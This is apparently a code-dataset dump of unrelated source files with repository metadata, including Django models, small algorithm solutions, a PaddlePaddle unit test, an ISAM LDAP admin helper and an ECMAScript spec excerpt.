ebbfc69c9b14b8fd0e8b51abb0ba4f767abce6e9
|
/sandbook/base/models/novel.py
|
3e4e8fdb929f8cfbc346753c49db9354d87a73f8
|
[] |
no_license
|
lwaxx/novel
|
0a882347dffaafb35f061eaf6301abe32254b54f
|
5b538e85606cd22c34ac10f53438fc0d3ff131a0
|
refs/heads/master
| 2022-06-30T03:21:52.673001 | 2020-05-09T15:26:58 | 2020-05-09T15:26:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,965 |
py
|
import os
import re
import time
from django.core.files.storage import FileSystemStorage
from django.db import models
from base.constants.novel import (
DEFAULT_COVER, NOVEL_STATUS_UNAPPROVED, NOVEL_STATUS_ACTIVE, NOVEL_STATUS_FINISHED,
NOVEL_STATUS_BLOCKED
)
from django.core.cache import cache
from general.utils.text import get_filename_extension, calc_word_count
class CategoryMixin:
@property
def novel_count_key(self):
raise NotImplementedError
def novel_count(self):
return cache.get(self.novel_count_key)
class Category(CategoryMixin, models.Model):
"""
一级分类
"""
name = models.CharField('名称', max_length=32)
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_category'
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'sc_%d_count' % self.id
class SubCategory(CategoryMixin, models.Model):
"""
二级分类
"""
name = models.CharField('名称', max_length=32)
category = models.ForeignKey(Category, on_delete=models.CASCADE, verbose_name='一级分类')
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_sub_category'
default_permissions = ()
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'c_%d_count' % self.id
def incr_novel_count(self, count: int):
"""
count 可以为正负整数
"""
cache.incr(self.novel_count_key, count)
def cover_path(instance, filename):
new_name = '%s.%s' % (str(int(time.time())), get_filename_extension(filename))
return os.path.join('novel', 'cover', str(instance.author_id), new_name)
class Novel(models.Model):
"""
小说
"""
STATUS = {
'unapproved': NOVEL_STATUS_UNAPPROVED,
'active': NOVEL_STATUS_ACTIVE,
'finished': NOVEL_STATUS_FINISHED,
'blocked': NOVEL_STATUS_BLOCKED,
}
STATUS_CHOICES = (
(STATUS['unapproved'], '未审核'),
(STATUS['active'], '连载中'),
(STATUS['finished'], '已完结'),
(STATUS['blocked'], '已屏蔽')
)
name = models.CharField('书名', unique=True, max_length=64) # TODO: 书名验证
author = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='作者')
intro = models.TextField('简介', max_length=1024)
status = models.SmallIntegerField('状态', choices=STATUS_CHOICES, default=NOVEL_STATUS_UNAPPROVED)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, verbose_name='一级分类')
sub_category = models.ForeignKey(SubCategory, on_delete=models.SET_NULL, null=True, verbose_name='二级分类')
cover = models.ImageField(
'封面', storage=FileSystemStorage(), default=DEFAULT_COVER,
upload_to=cover_path, blank=True
)
word_count = models.PositiveIntegerField('字数', default=0)
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel'
ordering = ('-id',)
default_permissions = ()
permissions = (
('view_novel', '查看小说'),
('create_novel', '创建小说'),
('change_novel', '更改小说'),
('delete_novel', '删除小说'),
('finish_novel', '完结小说'),
('block_novel', '屏蔽小说'),
('verify_novel', '审核小说')
)
class NovelComment(models.Model):
"""
书评
"""
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说', related_name='comments', )
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户',
related_name='nc_user')
title = models.CharField('标题', max_length=32, blank=True) # 标题可选
content = models.CharField('内容', max_length=4096)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment'
default_permissions = ()
class NovelCommentReply(models.Model):
"""
书评回复
"""
comment = models.ForeignKey(NovelComment, on_delete=models.CASCADE, related_name='replies',
verbose_name='书评')
content = models.CharField('内容', max_length=1024)
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='nc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment_reply'
default_permissions = ()
class Volume(models.Model):
"""
卷
"""
name = models.CharField('卷名', max_length=32, default='正文卷')
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_volume'
default_permissions = ()
class Chapter(models.Model):
"""
章节
"""
STATUS = {
'saved': 0,
'submitted': 1,
'blocked': 2,
'approved': 3 # 暂不用
}
STATUS_CHOICES = (
(STATUS['saved'], '已保存'),
(STATUS['submitted'], '已提交'),
(STATUS['blocked'], '已屏蔽'),
(STATUS['approved'], '已审核')
)
title = models.CharField('标题', max_length=32, blank=True, default='新章节') # TODO: 章节名验证
content = models.TextField('内容', max_length=65535, blank=True)
volume = models.ForeignKey(Volume, on_delete=models.CASCADE, verbose_name='卷')
word_count = models.PositiveIntegerField('字数', default=0)
is_free = models.BooleanField('免费', default=True)
status = models.IntegerField('状态', choices=STATUS_CHOICES, default=STATUS['saved'])
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel_chapter'
default_permissions = ()
# class ChapterUpdated(models.Model):
# ...
class Paragraph(models.Model):
"""
段落
"""
chapter = models.ForeignKey(Chapter, on_delete=models.CASCADE, verbose_name='章节')
content = models.TextField('内容', max_length=65535) # TODO: 段落字数限制
serial = models.PositiveIntegerField('序号', default=1)
class Meta:
db_table = 'base_novel_paragraph'
default_permissions = ()
unique_together = (('chapter', 'serial'),)
@property
def word_count(self):
return calc_word_count(self.content)
class ParagraphComment(models.Model):
"""
段评
"""
paragraph = models.ForeignKey(Paragraph, on_delete=models.CASCADE, verbose_name='段落')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户')
content = models.CharField('内容', max_length=1024)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment'
default_permissions = ()
class ParagraphCommentReply(models.Model):
"""
段评回复
"""
paragraph_comment = models.ForeignKey(ParagraphComment, on_delete=models.CASCADE, verbose_name='段评')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='pc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment_reply'
default_permissions = ()
|
[
"[email protected]"
] | |
dcd9d496ee0141ea04f9a8c83b711f5ce5252089
|
ffc1cc3bb7b68335b115122fdc7924fc4e31d528
|
/pro38.py
|
fd23c4fc45f9509da980b95618a4cae2a5d6442b
|
[] |
no_license
|
Rihanashariff/swathi24
|
dba1dd3c3d2ff583ae431b432e0ef262bfeb3ac3
|
2b0d21f2febdd2a563e8f0affeebd5ca7a5821b8
|
refs/heads/master
| 2020-07-02T05:28:32.199982 | 2019-06-29T08:22:10 | 2019-06-29T08:22:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 132 |
py
|
#s
n,k = map(int,input().split())
l = list(map(int,input().split()))
c= 0
for i in l:
if(i+k <=5):
c+=1
g=c//3
print(g)
|
[
"[email protected]"
] | |
cc09ec3dc544f923a01256d80c96928a1ec33d28
|
0dc24a6e729a4b438fbcd9cfb72da3b6ee716d77
|
/ksiazka_zrob_to_sam/my_electric_car.py
|
10fbec7652bb7144eb706ddd63de707e5df80507
|
[] |
no_license
|
Licho59/learning_python_eric_matthes_book
|
fca84a2bff207c10dec20c7fea9aeacf05d6a101
|
969f95132822d8bd21c30403d8e0bf6aadb9914f
|
refs/heads/master
| 2021-09-01T03:41:37.281741 | 2017-12-24T15:12:13 | 2017-12-24T15:12:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 784 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 8 21:20:17 2017
@author: Leszek
"""
from car import ElectricCar
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
my_tesla.battery.describe_battery()
my_tesla.battery.get_range()
# Import wielu klas z modułu
from car import Car, ElectricCar
my_beetle = Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Import całego modułu
import car
my_beetle = car.Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = car.ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Import wszystkich klas modułu
from car import *
|
[
"[email protected]"
] | |
5487773f243f788ebc92256016ebad447a41750c
|
d5f75adf5603927396bdecf3e4afae292143ddf9
|
/python/paddle/fluid/tests/unittests/test_kthvalue_op.py
|
66eb8ab4f31fba1ef8cb7eee8a8896077b683a1f
|
[
"Apache-2.0"
] |
permissive
|
jiweibo/Paddle
|
8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4
|
605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74
|
refs/heads/develop
| 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 |
Apache-2.0
| 2023-04-04T02:42:53 | 2019-07-11T03:51:12 |
Python
|
UTF-8
|
Python
| false | false | 6,945 |
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
def cal_kthvalue(x, k, axis, keepdim=False):
if axis < 0:
axis = len(x.shape) + axis
indices = np.argsort(x, axis=axis)
value = np.sort(x, axis=axis)
indices = indices.take(indices=k - 1, axis=axis)
value = value.take(indices=k - 1, axis=axis)
if keepdim:
indices = np.expand_dims(indices, axis)
value = np.expand_dims(value, axis)
return value, indices
class TestKthvalueOp(OpTest):
def init_args(self):
self.k = 5
self.axis = -1
def setUp(self):
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((2, 1, 2, 4, 10))
self.init_args()
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpWithKeepdim(OpTest):
def init_args(self):
self.k = 2
self.axis = 1
def setUp(self):
self.init_args()
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((1, 3, 2, 4, 10))
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis, 'keepdim': True}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis,
keepdim=True)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpKernels(unittest.TestCase):
def setUp(self):
self.axises = [2, -1]
def test_kthvalue_op(self):
paddle.disable_static()
def test_cpu_kernel():
shape = (2, 128, 10)
k = 2
paddle.set_device('cpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
def test_gpu_kernel():
shape = (2, 30, 250)
k = 244
paddle.set_device('gpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
test_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_gpu_kernel()
class TestKthvalueOpWithNaN(unittest.TestCase):
def setUp(self):
paddle.disable_static()
self.x = paddle.uniform([2, 200, 10], dtype='float32')
def test_errors(self):
def test_nan_in_cpu_kernel():
paddle.set_device('cpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
def test_nan_in_gpu_kernel():
paddle.set_device('gpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
test_nan_in_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_nan_in_gpu_kernel()
class TestKthvalueOpErrors(unittest.TestCase):
def setUp(self):
self.x = paddle.uniform([2, 10, 20, 25], dtype='float32')
def test_errors(self):
paddle.disable_static()
def test_k_lowrange_error():
self.x.kthvalue(k=0, axis=2)
self.assertRaises(ValueError, test_k_lowrange_error)
def test_k_uprange_error():
self.x.kthvalue(k=500, axis=2)
self.assertRaises(ValueError, test_k_uprange_error)
def test_dim_range_error():
self.x.kthvalue(k=10, axis=5)
self.assertRaises(ValueError, test_dim_range_error)
class TestModeOpInStatic(unittest.TestCase):
def setUp(self):
np.random.seed(666)
self.input_data = np.random.random((2, 20, 1, 2, 80)).astype(np.float64)
self.k = 10
def test_run_static(self):
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(),
paddle.static.Program()):
input_tensor = paddle.static.data(name="x",
shape=[2, 20, 1, 2, 80],
dtype="float64")
result = paddle.kthvalue(input_tensor, self.k, axis=1)
expect_value = cal_kthvalue(self.input_data, self.k, axis=1)[0]
exe = paddle.static.Executor(paddle.CPUPlace())
paddle_result = exe.run(feed={"x": self.input_data},
fetch_list=[result])[0]
self.assertTrue(np.allclose(paddle_result, expect_value))
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
a272e1b11c4ec4f975a6dd241d020af9876ef059
|
6d8ed9e06e7783443fac3d100a4fdea304d5d64e
|
/dashboard/internet_nl_dashboard/migrations/0036_urllistreport_average_internet_nl_score.py
|
de64746ac2b34bee044538ef4f70302d905e030b
|
[
"Apache-2.0"
] |
permissive
|
internetstandards/Internet.nl-dashboard
|
399c6d13d66bbc56b1a5b964a727cc299d351bd8
|
f1f68352a173689e2386d790f69bd28640a75e09
|
refs/heads/main
| 2023-08-31T21:01:42.739287 | 2023-07-12T10:51:16 | 2023-07-12T10:51:16 | 175,843,928 | 7 | 8 |
Apache-2.0
| 2023-09-13T08:45:51 | 2019-03-15T15:16:49 |
JavaScript
|
UTF-8
|
Python
| false | false | 667 |
py
|
# Generated by Django 2.2.2 on 2019-06-28 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('internet_nl_dashboard', '0035_auto_20190624_0712'),
]
operations = [
migrations.AddField(
model_name='urllistreport',
name='average_internet_nl_score',
field=models.FloatField(
default=0, help_text='Internet.nl scores are retrieved in point. The calculation done for that is complex and subject to change over time. Therefore it is impossible to re-calculate that score here.Instead the score is stored as a given.'),
),
]
|
[
"[email protected]"
] | |
b363e6a7cb06107e6b57f522269db06f2372e699
|
7be4f595d555614a28f708c1ba7edda321f0cf30
|
/practice/algorithms/implementation/find_digits/find_digits.py
|
944aa7f96b379dc5bf1efe15f35da50bb098ef74
|
[] |
no_license
|
orel1108/hackerrank
|
de31a2d31aaf8aeb58477d1f2738744bfe492555
|
55da1f3a94e8c28ed0f0dea3103e51774f0047de
|
refs/heads/master
| 2021-04-09T17:38:25.112356 | 2017-01-22T11:21:19 | 2017-01-22T11:21:19 | 50,198,159 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 153 |
py
|
t = int(raw_input())
for _ in range(t) :
n = raw_input()
digits = map(int, n)
print len(filter(lambda x: x > 0 and int(n) % x == 0, digits))
|
[
"[email protected]"
] | |
444d45bf3c5ac155b55dfd08b8250911a948e0c8
|
a550aece79bda789826b463280b91abffbf2d372
|
/books/python-3-oop-packt/Chapter7/7_28_callable_repeat.py
|
09746de64e095feb18df107627ebdb96c1fe1546
|
[
"MIT"
] |
permissive
|
phiratio/learn_python
|
20376470eaa292c157fd01f52b3077e3a983cd5a
|
a32240d4355fb331805d515f96e1d009914e5c47
|
refs/heads/master
| 2022-11-27T07:07:45.712373 | 2020-12-03T22:04:31 | 2020-12-03T22:04:31 | 189,397,679 | 1 | 0 |
MIT
| 2022-11-22T04:40:27 | 2019-05-30T10:56:10 |
Python
|
UTF-8
|
Python
| false | false | 469 |
py
|
from timer import Timer
import datetime
def format_time(message, *args):
now = datetime.datetime.now().strftime("%I:%M:%S")
print(message.format(*args, now=now))
class Repeater:
def __init__(self):
self.count = 0
def __call__(self, timer):
format_time("{now}: repeat {0}", self.count)
self.count += 1
timer.call_after(5, self)
timer = Timer()
timer.call_after(5, Repeater())
format_time("{now}: Starting")
timer.run()
|
[
"[email protected]"
] | |
088099fe03d5e3dee4df77f61ea5cb2aa08d45d5
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/M8hDPzNZdie8aBMcb_11.py
|
f8aa226b0f1d8e00377c89c45f1f158d226792c3
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 737 |
py
|
"""
Implement a function count_substring that counts the number of substrings that
begin with character "A" and ends with character "X".
For example, given the input string `"CAXAAYXZA"`, there are four substrings
that begin with "A" and ends with "X", namely: "AX", "AXAAYX", "AAYX", and
"AYX".
### Examples
count_substring("CAXAAYXZA") ➞ 4
count_substring("AAXOXXA") ➞ 6
count_substring("AXAXAXAXAX") ➞ 15
### Notes
* You should aim to avoid using nested loops to complete the task.
* You can assume that the input string is composed of English upper case letters only.
"""
def count_substring(txt: str) -> int:
return sum(txt[i:].count('X') for i,v in enumerate(txt[:-1]) if v == 'A')
|
[
"[email protected]"
] | |
5458665911175eba625d5f5b7fc0cc7853562425
|
9d82e37d34ed4d836fcef98ed37ed7ac5c49b316
|
/ibmsecurity/isam/web/embedded_ldap/admin.py
|
a068695630ebb77e72b212d90faed1a94943d4d2
|
[
"Apache-2.0"
] |
permissive
|
keiran-ibm/ibmsecurity
|
075c156961e371c0e85a7c360fb2d82954315bb6
|
b1a77f7a1e8c3cce67e2c3af85c20626d42c0bbd
|
refs/heads/master
| 2022-02-14T14:24:15.687461 | 2019-01-18T05:21:19 | 2019-01-18T05:21:19 | 116,325,033 | 0 | 0 |
Apache-2.0
| 2019-01-18T05:16:46 | 2018-01-05T01:23:35 |
Python
|
UTF-8
|
Python
| false | false | 643 |
py
|
import logging
logger = logging.getLogger(__name__)
def set_pw(isamAppliance, password, check_mode=False, force=False):
"""
Changing the administrator password of the embedded LDAP server
"""
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Changing the administrator password of the embedded LDAP server",
"/isam/embedded_ldap/change_pwd/v1",
{
"password": password
})
|
[
"[email protected]"
] | |
be65e8b6843e01ce485befc48c2d14bde2967dea
|
7bc54bae28eec4b735c05ac7bc40b1a8711bb381
|
/src/contradiction/medical_claims/alamri/tfrecord_gen.py
|
5ddfa13b77c7f7eda2cea802707861ff4e6e6373
|
[] |
no_license
|
clover3/Chair
|
755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e
|
a2102ebf826a58efbc479181f1ebb5de21d1e49f
|
refs/heads/master
| 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 |
Python
|
UTF-8
|
Python
| false | false | 3,932 |
py
|
import json
import os
from typing import Iterator
from contradiction.medical_claims.alamri.pairwise_gen import enum_true_instance, enum_neg_instance, enum_neg_instance2, \
enum_neg_instance_diff_review
from contradiction.medical_claims.biobert.voca_common import get_biobert_tokenizer
from cpath import at_output_dir, output_path
from data_generator.cls_sep_encoder import get_text_pair_encode_fn, PairedInstance
from data_generator.tokenizer_wo_tf import get_tokenizer
from misc_lib import DataIDManager, exist_or_mkdir
from tf_util.record_writer_wrap import write_records_w_encode_fn
Entailment = 0
Neutral = 1
Contradiction = 2
def generate_true_pairs(data_id_man):
yield from generate_inner(data_id_man, enum_true_instance)
def generate_neg_pairs(data_id_man):
enum_fn = enum_neg_instance
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs2(data_id_man) -> Iterator[PairedInstance]:
enum_fn = enum_neg_instance2
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs_diff_review(data_id_man):
enum_fn = enum_neg_instance_diff_review
yield from generate_inner(data_id_man, enum_fn)
def generate_inner(data_id_man, enum_fn) -> PairedInstance:
for c1, c2, pair_type in enum_fn():
info = {
'text1': c1.text,
'text2': c2.text,
'pair_type': pair_type
}
inst = PairedInstance(c1.text, c2.text, data_id_man.assign(info), Neutral)
yield inst
def generate_and_write(file_name, generate_fn, tokenizer):
data_id_man = DataIDManager()
inst_list = generate_fn(data_id_man)
max_seq_length = 300
save_path = at_output_dir("alamri_tfrecord", file_name)
encode_fn = get_text_pair_encode_fn(max_seq_length, tokenizer)
write_records_w_encode_fn(save_path, encode_fn, inst_list)
info_save_path = at_output_dir("alamri_tfrecord", file_name + ".info")
json.dump(data_id_man.id_to_info, open(info_save_path, "w"))
def bert_true_pairs():
tokenizer = get_tokenizer()
file_name = "bert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_true_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs2():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs2():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs_diff_review():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs_diff_review():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def main():
exist_or_mkdir(os.path.join(output_path, "alamri_tfrecord"))
bert_neg_pairs_diff_review()
biobert_neg_pairs_diff_review()
# bert_neg_pairs2()
# biobert_neg_pairs2()
# bert_true_pairs()
# bert_neg_pairs()
# biobert_true_pairs()
# biobert_neg_pairs()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
b324821f4e1cb588672bdca6d07e05ff834b9547
|
a939ec03a7eb31962817d6cffea7f125ea4d69db
|
/DataScience/pandas/Example02_series.py
|
9983ac491066a66c45841303c88fcc293db3bfb3
|
[] |
no_license
|
dipayandutta/python3
|
e21e50d7a21315bc63702a103af79f3d61d91ab1
|
f3d01ea52d05a23103cf86afbf5dff64a5d36634
|
refs/heads/master
| 2022-12-10T09:13:04.967400 | 2021-07-25T15:20:40 | 2021-07-25T15:20:40 | 153,072,927 | 0 | 0 | null | 2022-11-22T02:24:01 | 2018-10-15T07:46:28 |
Python
|
UTF-8
|
Python
| false | false | 144 |
py
|
#Manually assign index values to a series
import pandas as pd
series = pd.Series(['Dipayan','Ruby'],index=['Husband','spouse'])
print(series)
|
[
"[email protected]"
] | |
5f956a3f925ac4a9a724e8128b079d5b8afa2c82
|
45734abde30b437c2a1ba80653d7323e5c1d8c7f
|
/python/0320_generalized_abbreviation.py
|
f56e22143bc7bf3043f75dbf895dd29533b46079
|
[] |
no_license
|
rdtr/leetcode_solutions
|
6629e03dd5b5fee15aaabe7f53204778f237ed96
|
51800d33c57e36ef62b6067d6f91a82c0e55dc6d
|
refs/heads/main
| 2022-05-21T12:17:23.201832 | 2022-03-12T09:20:46 | 2022-03-12T09:20:46 | 80,395,988 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 717 |
py
|
from collections import deque
class Solution:
def generateAbbreviations(self, word: str) -> List[str]:
res = []
self.helper(word, 0, 0, '', res)
return res
def helper(self, word, pos, length, cur, res):
if pos >= len(word):
if length > 0:
cur += str(length)
res.append(cur)
return
if length == 0: # just consume one character
self.helper(word, pos + 1, 0, cur + word[pos], res)
else: # perform abbr
self.helper(word, pos + 1, 0, cur + str(length) + word[pos], res)
# skip this character and increment abbr length
self.helper(word, pos + 1, length + 1, cur, res)
|
[
"[email protected]"
] | |
0991be737f49582ec10aa7eedbd0a61d6dfe7b40
|
9b0bdebe81e558d3851609687e4ccd70ad026c7f
|
/剑指offer/02.从尾到头打印链表.py
|
c171768fb4cf4ebffccff7c7bf930ebb8b0066c0
|
[] |
no_license
|
lizenghui1121/DS_algorithms
|
645cdad007ccbbfa82cc5ca9e3fc7f543644ab21
|
9690efcfe70663670691de02962fb534161bfc8d
|
refs/heads/master
| 2022-12-13T22:45:23.108838 | 2020-09-07T13:40:17 | 2020-09-07T13:40:17 | 275,062,257 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 509 |
py
|
"""
输入一个链表,按链表从尾到头的顺序返回一个ArrayList。
@Author: Li Zenghui
@Date: 2020-03-02 20:10
"""
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# 返回从尾部到头部的列表值序列,例如[1,2,3]
def printListFromTailToHead(self, listNode):
res = []
p = listNode
while p:
res.insert(0, p.val)
p = p.next
return res
|
[
"[email protected]"
] | |
b08c2c670bcb0c5c3ca004b5b5e8ae7656f10ffa
|
369b985626c565096a3e65635542ac708339b329
|
/blog/urls.py
|
9a3cbcfd3770f5beceeffc016a5790b887880504
|
[
"MIT"
] |
permissive
|
ernestmucheru/Week4-IP
|
9a68b28a127d8746d777d7b67e2cc055d034980c
|
be80372a33cbc3e80644915db66e0bf51cced175
|
refs/heads/main
| 2023-06-27T19:45:48.071039 | 2021-07-27T06:34:22 | 2021-07-27T06:34:22 | 389,307,262 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 646 |
py
|
from django.urls import path
# from .views import (PostListView,PostDetailView,PostCreateView,PostUpdateView,PostDeleteView)
from . import views
urlpatterns =[
# path('', PostListView.as_view(), name='blog'),
# path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
# path('post/new/', PostCreateView.as_view(), name='post-create'),
# path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
# path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
path('new-post', views.create_post, name='post'),
path('<hood_id>/new-post', views.create_post, name='post')
]
|
[
"[email protected]"
] | |
2f9e3f9b1f607d3f89fc3e056f19fcccad2f74fe
|
28a462a28f443c285ca5efec181ebe36b147c167
|
/tests/compile/basic/recent/String.prototype.startsWith.spec
|
ba62e090c26d2ee9be97ca1a97a2010796ad2856
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
kaist-plrg/jstar
|
63e71f9156860dc21cccc33a9f6c638dfee448ea
|
1282919127ea18a7e40c7a55e63a1ddaaf7d9db4
|
refs/heads/main
| 2022-07-22T08:12:34.947712 | 2022-02-27T04:19:33 | 2022-02-27T11:06:14 | 384,045,526 | 6 | 4 |
NOASSERTION
| 2022-02-27T11:05:26 | 2021-07-08T07:53:21 |
Python
|
UTF-8
|
Python
| false | false | 884 |
spec
|
1. Let _O_ be ? RequireObjectCoercible(*this* value).
1. Let _S_ be ? ToString(_O_).
1. Let _isRegExp_ be ? IsRegExp(_searchString_).
1. If _isRegExp_ is *true*, throw a *TypeError* exception.
1. Let _searchStr_ be ? ToString(_searchString_).
1. Let _len_ be the length of _S_.
1. If _position_ is *undefined*, let _pos_ be 0; else let _pos_ be ? ToIntegerOrInfinity(_position_).
1. Let _start_ be the result of clamping _pos_ between 0 and _len_.
1. Let _searchLength_ be the length of _searchStr_.
1. If _searchLength_ = 0, return *true*.
1. Let _end_ be _start_ + _searchLength_.
1. If _end_ > _len_, return *false*.
1. Let _substring_ be the substring of _S_ from _start_ to _end_.
1. Return ! SameValueNonNumeric(_substring_, _searchStr_).
|
[
"[email protected]"
] | |
9d0b0a941398fd991247b3a0ec96412244d364c5
|
30fe7671b60825a909428a30e3793bdf16eaaf29
|
